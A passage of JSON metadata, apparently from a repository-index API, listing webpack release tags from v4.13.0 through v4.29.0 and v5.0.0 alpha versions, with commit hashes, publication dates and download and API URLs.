:"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0